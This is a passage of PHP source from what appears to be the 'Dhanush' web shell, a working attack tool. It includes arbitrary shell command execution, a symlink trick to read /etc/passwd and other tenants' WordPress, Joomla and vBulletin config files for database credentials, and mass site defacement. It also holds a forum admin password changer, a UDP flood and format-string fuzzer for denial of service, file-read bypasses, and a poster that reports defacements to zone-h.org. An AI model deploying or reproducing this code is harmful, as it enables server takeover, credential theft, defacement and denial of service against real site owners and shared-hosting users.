2849 $namafile = remotedownload($functiontype,$wurl);
2850 $fullpath = $path . $directorysperator . $namafile;
2851 if(is_file($fullpath))
2852 {
2853 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2854 }
2855 else
2856 echo "<center>Failed to upload $namafile</center>";
2857 }
2858 else if(isset($_GET['createfolder']))
2859 {
2860 if(!mkdir($_GET['createfolder']))
2861 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
2862 else
2863 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
2864 }
2865 else if(isset($_GET['selfkill']))
2866 {
2867 if(unlink($curfile))
2868 echo "<br><center><font size=5>Good Bye......</font></center>";
2869 else
2870 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2871 }
2872 else if(isset($_GET['Create']))
2873 {
2874 ?><BR>
2875 <form method="post">
2876 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2877 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2878 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2879 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
2880 </form>
2881
2882 <?php }
2883 else if(isset($_GET['readfile']))
2884 {
2885 if(is_file($_GET['readfile']))
2886 {
2887 $owner = "0/0";
2888 if($os == "Linux")
2889 $owner = getOGid($_GET['readfile']);
2890 ?>
2891 <form>
2892 <table style="width:57%;">
2893 <tr align="left">
2894 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
2895 </tr>
2896 <tr>
2897 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2898 </tr>
2899 </table>
2900 <textarea name="content" rows="15" cols="100" class="box"><?php
2901 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
2902 if($content)
2903 {
2904 echo $content;
2905 }
2906 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2907 {
2908 if(filesize($_GET['readfile']) != 0 )
2909 {
2910 fopen($_GET['readfile']);
2911 while(!feof())
2912 {
2913 echo htmlspecialchars(fgets($_GET['readfile']));
2914 }
2915 }
2916 }
2917
2918 ?>
2919 </textarea><br />
2920 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2921 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
2922 </form>
2923 <?php
2924 }
2925 else
2926 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
2927 }
2928 else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2929 {
2930 $content = $_POST['filecontent'];
2931 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2932 {
2933 fwrite($file_pointer, $content);
2934 fclose($file_pointer);
2935 echo "<font class=txt>File Created Successfully</font>";
2936 }
2937 else
2938 echo "Cannot Create File";
2939 }
2940 else if(isset($_REQUEST["mymassdeface"]))
2941 {
2942 ?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
2943 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
2944 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
2945 </tr></table></center><br><div id="showmydeface"></div><?php
2946 }
2947 else if(isset($_REQUEST["masswp"]))
2948 {
2949 ?><center><form method="post"><textarea id="masswpdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
2950 <br><input type="button" onClick="massdeface('domasswp',masswpdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
2951 }
2952 else if(isset($_REQUEST["massjo"]))
2953 {
2954 ?><center><form method="post"><textarea id="masswpdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
2955 <br><input type="button" onClick="massdeface('domassjo',masswpdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
2956 }
2957 else if(isset($_REQUEST["massvb"]))
2958 {
2959 ?><center><form method="post"><textarea id="masswpdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
2960 <br><input type="button" onClick="massdeface('domassvb',masswpdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
2961 }
2962 else if(isset($_REQUEST["massscript"]))
2963 {
2964 if($os != "Windows")
2965 {
2966 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2967 $path=explode('/',$url);
2968 $url =str_replace($path[count($path)-1],'',$url);
2969
2970 if($_REQUEST["massscript"] == "domasswp")
2971 {
2972 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
2973 mkdir("dhanush");
2974 chdir("dhanush");
2975 execmd("ln -s / root");
2976 $file3 = 'Options all
2977 DirectoryIndex Sux.html
2978 AddType text/plain .php
2979 AddHandler server-parsed .php
2980 AddType text/plain .html
2981 AddHandler txt .html
2982 Require None
2983 Satisfy Any
2984 ';
2985 $fp3 = fopen('.htaccess','w');
2986 $fw3 = fwrite($fp3,$file3);
2987 @fclose($fp3);
2988 if(@file('/etc/passwd'))
2989 {
2990 $users = file('/etc/passwd');
2991 foreach($users as $user)
2992 {
2993 $user = explode(':', $user);
2994
2995 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
2996 if(entre2v2($conf,"define('DB_USER', '","');"))
2997 changeindexwp($conf,$_REQUEST['massdef']);
2998 }
2999 }
3000 else
3001 {
3002 $temp = "";
3003 $val1 = 0;
3004 $val2 = 1000;
3005 for(;$val1 <= $val2;$val1++)
3006 {
3007 $uid = @posix_getpwuid($val1);
3008 if ($uid)
3009 $temp .= join(':',$uid)."
3010 ";
3011 }
3012
3013 $temp = trim($temp);
3014
3015 if($file5 = fopen("test.txt","w"))
3016 {
3017 fputs($file5,$temp);
3018 fclose($file5);
3019
3020 $file = fopen("test.txt", "r");
3021 while(!feof($file))
3022 {
3023 $s = fgets($file);
3024 $matches = array();
3025 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3026 $matches = str_replace("home/","",$matches[1]);
3027 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3028 continue;
3029 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3030 if(entre2v2($conf,"define('DB_USER', '","');"))
3031 changeindexwp($conf,$_REQUEST['massdef']);
3032 }
3033 fclose($file);
3034 }
3035 }
3036 }
3037 elseif($_REQUEST["massscript"] == "domassjo")
3038 {
3039 mkdir("dhanush");
3040 chdir("dhanush");
3041 $d0mains = @file("/etc/named.conf");
3042 if($d0mains)
3043 {
3044 $defcount = 0;
3045 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
3046 foreach($d0mains as $d0main)
3047 {
3048 if(eregi("zone",$d0main))
3049 {
3050 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3051 flush();
3052
3053 if(strlen(trim($domains[1][0])) > 2)
3054 {
3055 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3056 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
3057 if(entre2v2($conf,$dol."user = '","';"))
3058 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
3059 }
3060 }
3061 }
3062 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
3063 }
3064 else
3065 echo "Cannot Read /etc/named.conf";
3066 }
3067 elseif($_REQUEST["massscript"] == "domassvb")
3068 {
3069 mkdir("dhanush");
3070 chdir("dhanush");
3071 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3072
3073 if(@file('/etc/passwd'))
3074 {
3075 $users = file('/etc/passwd');
3076 foreach($users as $user)
3077 {
3078 $user = explode(':', $user);
3079 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
3080 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3081 changeindexvb($conf,$_REQUEST['massdef']);
3082 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
3083 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3084 changeindexvb($conf,$_REQUEST['massdef']);
3085 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
3086 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3087 changeindexvb($conf,$_REQUEST['massdef']);
3088
3089 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
3090 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3091 changeindexvb($conf,$_REQUEST['massdef']);
3092 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
3093 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3094 changeindexvb($conf,$_REQUEST['massdef']);
3095 }
3096 }
3097 else
3098 {
3099 $temp = "";
3100 $val1 = 0;
3101 $val2 = 1000;
3102 for(;$val1 <= $val2;$val1++)
3103 {
3104 $uid = @posix_getpwuid($val1);
3105 if ($uid)
3106 $temp .= join(':',$uid)."
3107 ";
3108 }
3109
3110 $temp = trim($temp);
3111
3112 if($file5 = fopen("test.txt","w"))
3113 {
3114 fputs($file5,$temp);
3115 fclose($file5);
3116
3117 $file = fopen("test.txt", "r");
3118 while(!feof($file))
3119 {
3120 $s = fgets($file);
3121 $matches = array();
3122 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3123 $matches = str_replace("home/","",$matches[1]);
3124 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3125 continue;
3126 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
3127 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3128 changeindexvb($conf,$_REQUEST['massdef']);
3129 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
3130 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3131 changeindexvb($conf,$_REQUEST['massdef']);
3132 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
3133 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3134 changeindexvb($conf,$_REQUEST['massdef']);
3135 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
3136 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3137 changeindexvb($conf,$_REQUEST['massdef']);
3138 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
3139 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
3140 changeindexvb($conf,$_REQUEST['massdef']);
3141 changeindexvb($conf,$_REQUEST['massdef']);
3142 }
3143 fclose($file);
3144 }
3145 }
3146 }
3147 echo "</table><center>";
3148 }
3149 else
3150 echo "<center>Cannot do mass deface</center>";
3151 }
3152 else if(isset($_REQUEST["defaceforum"]))
3153 {
3154 ?>
3155 <center><div id="showdeface"></div>
3156 <font class="tblheads" size="4">Forum Index Changer</font>
3157 <form action="<?php echo $self; ?>">
3158 <input type="hidden" name="forum">
3159 <input type="hidden" name="defaceforum">
3160 <table border = "1" width="60%" height="316" style="text-align: center;" class="tbl" align="center">
3161 <tr>
3162 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
3163
3164 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
3165 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
3166 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
3167 <tr>
3168 <td height="50" width="50%">Type :
3169 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
3170 <option value="vb">vbulletin</option>
3171 <option value="mybb">Mybb</option>
3172 <option value="smf">SMF</option>
3173 <option value="ipb">IPB</option>
3174 <option value="wp">Wordpress</option>
3175 <option value="joomla">Joomla</option>
3176 </select></td>
3177 <td height="50" width="50%">Table Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
3178 </tr>
3179 <tr>
3180 <td height="167" width="50%" colspan=2><div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
3181
3182 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
3183 </p>
3184 </div>
3185
3186
3187 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center"><input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
3188 </td>
3189 </tr>
3190 </table>
3191 </form>
3192 </center>
3193 <?php
3194 }
3195 else if(isset($_GET["passwordchange"]))
3196 {
3197 echo "<center>"; ?>
3198 <div id="showchangepass"></div>
3199 <font class="tblheads" size="4">Forum Password Changer</font>
3200 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
3201 <input type="hidden" name="forums" value="vb">
3202 <table border = "1" width="60%" height="246" style="text-align: center;" class="tbl" align="center">
3203 <tr>
3204 <td height="50" width="50%"> <p align="center"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"><b> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></p></td> <tr><td height="50" width="50%"> <p align="center"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20">
3205 <tr>
3206 <td height="50" width="50%">Type :
3207 <select class=sbox id="myforums" name="myforums" onChange="showMsg(this.value)">
3208 <option value="vb">vbulletin</option>
3209 <option value="mybb">Mybb</option>
3210 <option value="smf">SMF</option>
3211 <option value="ipb">IPB</option>
3212 <option value="phpbb">PHPBB</option>
3213 <option value="wp">Wordpress</option>
3214 <option value="joomla">Joomla</option>
3215 </select></td>
3216 <td height="50" width="50%">Table Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
3217 </tr>
3218 <tr>
3219 <td colspan=2 height="100" width="780"><p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
3220
3221 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
3222
3223 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
3224
3225 <p><input type ="button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,myforums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
3226 </tr>
3227 </table>
3228 </form>
3229 </center>
3230 <?php
3231 }
3232 else if(isset($_GET['dosser']))
3233 {
3234 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
3235 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
3236 {
3237 $IP=$_GET['ip'];
3238 $port=$_GET['port'];
3239 $executionTime = $_GET['exTime'];
3240 $no0fBytes = $_GET['no0fBytes'];
3241 $data = "";
3242 $timeout = $_GET['timeout'];
3243 $packets = 0;
3244 $counter = $no0fBytes;
3245 $maxTime = time() + $executionTime;;
3246 while($counter--)
3247 {
3248 $data .= "X";
3249 }
3250 $data .= " Dhanush";
3251
3252 while(1)
3253 {
3254 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
3255 if($socket)
3256 {
3257 fwrite($socket , $data);
3258 fclose($socket);
3259 $packets++;
3260 }
3261 if(time() >= $maxTime)
3262 {
3263 break;
3264 }
3265 }
3266 echo "Dos Completed!<br>";
3267 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
3268 echo "Total Number of Packets Sent : " . $packets . "<br />";
3269 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
3270 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
3271 }
3272 }
3273 else if(isset($_GET['fuzzer']))
3274 {
3275 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
3276 {
3277 $IP=$_GET['ip'];
3278 $port=$_GET['port'];
3279 $times = $_GET['exTime'];
3280 $timeout = $_GET['timeout'];
3281 $send = 0;
3282 $ending = "";
3283 $multiplier = $_GET['multiplier'];
3284 $data = "";
3285 $mode="tcp";
3286 $data .= "GET /";
3287 $ending .= " HTTP/1.1
3288
3289
3290
3291 ";
3292 if($_GET['type'] == "tcp")
3293 {
3294 $mode = "tcp";
3295 }
3296
3297 while($multiplier--)
3298 {
3299 $data .= urlencode($_GET['no0fBytes']);
3300 }
3301 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
3302 $data .= "by-Dhanush".$ending;
3303 $length = strlen($data);
3304
3305
3306 echo "Sending Data :- <br /> <p align='center'>$data</p>";
3307
3308 for($i=0;$i<$times;$i++)
3309 {
3310 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
3311 if($socket)
3312 {
3313 fwrite($socket , $data , $length );
3314 fclose($socket);
3315 }
3316 }
3317 echo "Fuzzing Completed!<br>";
3318 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
3319 echo "Total Number of Packets Sent : " . $times . "<br />";
3320 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
3321 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
3322 }
3323 }
3324 else if(isset($_GET['bypassit']))
3325 {
3326 echo "<BR>";
3327 if(isset($_GET['copy']))
3328 {
3329 if(@copy($_GET['copy'],"test1.php"))
3330 {
3331 $fh=fopen("test1.php",'r');
3332 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
3333 @fclose($fh);
3334 unlink("test1.php");
3335 }
3336 }
3337 else if(isset($_GET['filecontents']))
3338 {
3339 echo "<textarea cols=100 rows=20 class=box readonly>";
3340 echo file_get_contents($_GET['filecontents']);
3341 echo "</textarea>";
3342 }
3343 else if(isset($_GET['stream']))
3344 {
3345 echo "<textarea cols=100 rows=20 class=box readonly>";
3346 $file=$_GET['stream'];
3347
3348 $file=$_GET['stream'];
3349 if ($stream = fopen($file, 'r')) {
3350 echo stream_get_contents($stream, -1, 0);
3351 fclose($stream);
3352 }
3353 echo "</textarea>";
3354 }
3355 else if(isset($_GET['curl']))
3356 {
3357 $ch=curl_init("file://" . $_GET['curl']);
3358 curl_setopt($ch,CURLOPT_HEADERS,0);
3359 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3360 $file_out=curl_exec($ch);
3361 curl_close($ch);
3362 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
3363 }
3364 else if(isset($_GET['include']))
3365 {
3366 if(file_exists($_GET['include']))
3367 {
3368 echo "<textarea cols=100 rows=20 class=box readonly>";
3369 @include($_GET['include']);
3370 echo "</textarea>";
3371 }
3372 else
3373 echo "<br><center>Can't Read" . $_GET['include'] . "</center>";
3374 }
3375 else if(isset($_GET['id']))
3376 {
3377 echo "<textarea cols=100 rows=20 class=box readonly>";
3378 for($uid=0;$uid<60000;$uid++)
3379 { //cat /etc/passwd
3380 $ara = posix_getpwuid($uid);
3381 if (!empty($ara))
3382 {
3383 while (list ($key, $val) = each($ara))
3384 {
3385 print "$val:";
3386 }
3387 print "
3388 ";
3389 }
3390 }
3391 echo "</textarea>";
3392 break;
3393 }
3394 else if(isset($_GET['tempnam']))
3395 {
3396 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
3397 $fp = fopen ( $mytmp, 'r' );
3398 while(!feof($fp))
3399 echo fgets($fp);
3400 fclose ( $fp );
3401 }
3402 else if(isset($_GET['symlnk']))
3403 {
3404 echo "<textarea cols=100 rows=20 class=box readonly>";
3405 @mkdir("mydhanush",0777);
3406 @chdir("mydhanush");
3407 execmd("ln -s /etc/passwd");
3408
3409 echo file_get_contents($curr_url . "/mydhanush/passwd");
3410 echo "</textarea>";
3411 }
3412 if(isset($_GET['newtype']))
3413 {
3414 $filename = $_GET['newtype'];
3415 echo "<textarea cols=100 rows=20 class=box readonly>";
3416 if($_GET['optiontype'] == "xxd")
3417 echo execmd("xxd ".$filename);
3418 else if($_GET['optiontype'] == "rev")
3419 echo execmd("rev ".$filename);
3420 if($_GET['optiontype'] == "tac")
3421 echo execmd("tac ".$filename);
3422 if($_GET['optiontype'] == "more")
3423 echo execmd("more ".$filename);
3424 if($_GET['optiontype'] == "less")
3425 echo execmd("less ".$filename);
3426 if($_GET['optiontype'] == "awk")
3427 echo execmd("awk '{ print }' ".$filename);
3428 echo "</textarea>";
3429 }
3430 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
3431 }
3432 // Deface Website
3433 else if(isset($_GET['deface']))
3434 {
3435 $myfile = fopen($_GET['deface'],'w');
3436 if(fwrite($myfile, base64_decode($ind)))
3437 {fclose($myfile);
3438 echo "Index Defaced Successfully";}
3439 else
3440 echo "Donot have write permission";
3441 }
3442 else if(isset($_GET['perms']))
3443 {
3444 ?><BR>
3445 <form>
3446 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
3447 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
3448 <tr>
3449 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
3450 </tr>
3451 <tr>
3452 <td colspan="2" align="center" style="height:60px">
3453 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
3454 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
3455 </td>
3456 </tr>
3457 </table>
3458
3459 </form>
3460 <?php
3461 }
3462 else if(isset($_GET["chmode"]))
3463 {
3464 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
3465 {
3466 echo '<br>';
3467 $perms = 0;
3468 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
3469 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
3470 if(@chmod($_GET['myfilename'],$perms))
3471 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
3472 else
3473 echo "<center><blink>Cannot Change File Permissions</blink></center>";
3474 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
3475 }
3476 }
3477 else if(isset($_GET['rename']))
3478 {
3479 ?><BR>
3480 <form>
3481 <table border="0" cellpadding="3" cellspacing="3">
3482 <tr>
3483 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
3484 </tr>
3485 <tr>
3486 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
3487 </tr>
3488 <tr>
3489 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
3490 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
3491 </td>
3492 </tr>
3493 </table>
3494 </form>
3495 <?php
3496
3497 }
3498 else if(isset($_GET['renamemyfile']))
3499 {
3500 if(isset($_GET['to']) && isset($_GET['file']))
3501 {
3502 echo '<br>';
3503 if(!rename($_GET['file'], $_GET['to']))
3504 echo "Cannot Rename File";
3505 else
3506 echo "<font class=txt>File Renamed Successfully</font>";
3507 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
3508 }
3509 }
3510 else if(isset($_GET['open']))
3511 {
3512 if(is_file($_GET['myfilepath']))
3513 {
3514 $owner = "0/0";
3515 if($os == "Linux")
3516 $owner = getOGid($_GET['myfilepath']);
3517
3518 ?>
3519 <form>
3520 <table style="width:57%;">
3521 <tr>
3522 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
3523 </tr>
3524 <tr>
3525 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3526 </tr>
3527 </table>
3528 <textarea name="content" rows="15" cols="100" class="box"><?php
3529 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
3530 if($content)
3531 {
3532 echo $content;
3533 }
3534 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3535 {
3536 if(filesize($_GET['myfilepath']) != 0 )
3537 {
3538 fopen($_GET['myfilepath']);
3539 while(!feof())
3540 {
3541 echo htmlspecialchars(fgets($_GET['myfilepath']));
3542 }
3543 }
3544 }
3545
3546 ?>
3547 </textarea><br />
3548 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3549 <input name="save" type="button" onClick="cancel()" value=" Cancel " id="spacing" class="but"/><BR><BR>
3550 </form>
3551 <?php
3552 }
3553 else
3554 echo "File does not exist !!!!";
3555 }
3556 else if(isset($_POST['file']) && isset($_POST['content']) )
3557 {
3558 echo '<BR>';
3559 if(file_exists($_POST['file']))
3560 {
3561 $handle = fopen($_POST['file'],"w");
3562 if(fwrite($handle,$_POST['content']))
3563 echo "<font class=txt>File Saved Successfully!</font>";
3564 else
3565 echo "Cannot Write into File";
3566 }
3567 else
3568 {
3569 echo "File Name Specified does not exists!";
3570 }
3571 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
3572 }
3573 else if(isset($_POST["SendNowToZoneH"]))
3574 {
3575 $hacker = $_POST['defacer'];
3576 $method = $_POST['hackmode'];
3577 $neden = $_POST['reason'];
3578 $site = $_POST['domain'];
3579
3580 if (empty($hacker))
3581 {
3582 die("<center>[-] You Must Fill the Attacker name !</center>");
3583 }
3584 elseif($method == "--------SELECT--------")
3585 {
3586 die("<center>[-] You Must Select The Method !</center>");
3587 }
3588 elseif($neden == "--------SELECT--------")
3589 {
3590 die("<center>[-] You Must Select The Reason</center>");
3591 }
3592 elseif(empty($site))
3593 {
3594 die("<center>[-] You Must Inter the Sites List !</center>");
3595 }
3596 // Zone-h Poster
3597 function ZoneH($url, $hacker, $hackmode,$reson, $site )
3598 {
3599 $k = curl_init();
3600 curl_setopt($k, CURLOPT_URL, $url);
3601 curl_setopt($k,CURLOPT_POST,true);
3602 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
3603 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
3604 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
3605 $kubra = curl_exec($k);
3606 curl_close($k);
3607 return $kubra;
3608 }
3609
3610 $i = 0;
3611 $sites = explode("
3612 ", $site);
3613 echo "<pre class=ml1 style='margin-top:5px'>";
3614 while($i < count($sites))
3615 {
3616 if(substr($sites[$i], 0, 4) != "http")
3617 {
3618 $sites[$i] = "http://".$sites[$i];
3619 }
3620 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
3621 echo "<font class=txt>Site : ".$sites[$i]." Posted !</font><br>";
3622 ++$i;
3623 }
3624
3625 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
3626 }
3627 else if(isset($_GET['executemycmd']))
3628 {
3629 $comm = $_GET['executemycmd'];
3630 chdir($_GET['executepath']);
3631 echo shell_exec($comm);
3632 }
3633 else if(isset($_GET['passwd']))
3634 {
